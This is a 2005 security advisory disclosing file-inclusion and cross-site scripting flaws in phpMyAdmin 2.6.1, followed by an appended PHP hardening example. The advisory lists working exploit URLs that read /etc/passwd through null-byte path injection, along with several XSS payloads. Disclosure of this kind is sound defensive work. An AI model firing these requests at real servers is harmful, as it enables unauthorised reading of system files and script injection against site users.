-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 24.2.2005

- --- 0. Description ---

phpMyAdmin 2.6.1 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, and manage keys on fields.

- --- 1. Remote file inclusion ---

1.0
This bug exists in css/phpmyadmin.css.php. You can include files. The error is in this code:

- ------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' . $theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
    include($tmp_file);
} // end of include theme_right.css.php
- ------

And now you can get files. For example:

http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00

etc.

1.1
The next include is in libraries/database_interface.lib.php. Code:

- ---
18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php');
- ---

For example:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3

Error message:

- ---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php) [function.main]: failed to open stream: No such file or directory in /www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php on line 18

Fatal error: main() [function.require]: Failed opening required './libraries/dbi/cXIb8O3.dbi.lib.php' (include_path='.:') in /www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php on line 18
- ---------------

Or, if PHP errors are displayed and register_globals=On, you can make XSS with the PHP bug. For example:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E

- --- 2. XSS aka Cross Site Scripting ---

If register_globals=On:

2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS

2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]

2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.

2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.

- --- 3. How to fix ---

Apply the patch from CVS or from
https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&file_id=122735&aid=1149381
to libraries/grab_globals.lib.php, or wait for the new version.

- --- 4. Greets ---

sp3x. I need help.. :(

- --- 5. Contact ---

Author: Maksymilian Arciemowicz
Location: Poland (Jelenia Gora), Luxembourg (Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCHR89znmvyJCR4zQRAtj3AJ4wxM3WEn56GNohsG3f4U8Ku+/I8wCeMWQr
YklTAm82iDqNu3so1uYsmEk=
=ko9x
-----END PGP SIGNATURE-----
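The root cause shared by sections 1 and 2 is that, with register_globals=On, request parameters such as GLOBALS[cfg][ThemePath], cfg[Server][extension] and theme overwrite configuration before it reaches an include() or is echoed into HTML. The following is an added example written for this advisory; it is not the phpMyAdmin patch referenced in section 3 nor any phpMyAdmin code. It shows the three checks a hardened entry point performs: refuse requests that try to set the GLOBALS or cfg variables, accept a theme name only if it matches an allowlist of installed themes (which also rejects "../" and the %00 null byte used in section 1.0), and escape values before they are printed into HTML. The function names pma_guard_request_globals, pma_resolve_theme_file and pma_html, the theme list and the request arrays are assumptions constructed for the example.

```php
<?php
// Added example (not phpMyAdmin code): hardened handling of the request
// values that the advisory shows being abused under register_globals=On.

// Refuse any request that tries to inject the GLOBALS or cfg variables
// (or another superglobal) through GET, POST or cookie data. With
// register_globals=On these would otherwise overwrite $GLOBALS['cfg']
// before it is used in include() or printed into HTML.
// Returns true when the request carries none of these names.
function pma_guard_request_globals(array $get, array $post, array $cookie): bool
{
    $forbidden = array('GLOBALS', 'cfg', '_GET', '_POST', '_COOKIE',
                       '_REQUEST', '_SERVER', '_ENV', '_FILES', '_SESSION');
    foreach ($forbidden as $name) {
        if (array_key_exists($name, $get)
            || array_key_exists($name, $post)
            || array_key_exists($name, $cookie)) {
            return false;
        }
    }
    return true;
}

// Resolve the theme stylesheet path from a request-supplied theme name.
// Only plain directory names that appear in the list of installed themes
// are accepted, so neither "../" sequences nor null bytes can steer the
// include. Returns null when the name is not acceptable; the caller must
// then fall back to a default theme instead of including anything.
function pma_resolve_theme_file(string $themePath, string $theme, array $installedThemes): ?string
{
    // \A and \z anchor the whole string; a null byte or "/" fails the match.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme)) {
        return null;
    }
    // Strict comparison against the allowlist of installed theme directories.
    if (!in_array($theme, $installedThemes, true)) {
        return null;
    }
    return $themePath . '/' . $theme . '/css/theme_right.css.php';
}

// Escape a value before interpolating it into HTML (section 2 shows
// strServer, bgcolor, row_no and the font-family values being printed raw).
function pma_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Demonstration with constructed request data. The values mirror the
// advisory's URLs but are hard-coded so the script runs offline.
$installed = array('original', 'darkblue_orange');   // assumed theme list
$themePath = './themes';

$malicious = array(
    'GLOBALS' => array('cfg' => array('ThemePath' => '/etc')),
    'theme'   => "passwd\0",
);
$clean = array('theme' => 'original');

var_dump(pma_guard_request_globals($malicious, array(), array()));
var_dump(pma_guard_request_globals($clean, array(), array()));

var_dump(pma_resolve_theme_file($themePath, "passwd\0", $installed));
var_dump(pma_resolve_theme_file($themePath, '../../../etc', $installed));
var_dump(pma_resolve_theme_file($themePath, 'original', $installed));

// The markup from the section 2 URLs becomes inert text once escaped.
echo pma_html('777777"><H1>XSS'), "\n";
```

The guard is a request-level check, so it also covers the select_server.lib.php and display_tbl_links.lib.php cases that inject cfg[Servers][...] and cfg[BgcolorOne]; the allowlist replaces the file_exists() test in the original code, which only confirmed that the attacker-chosen path exists.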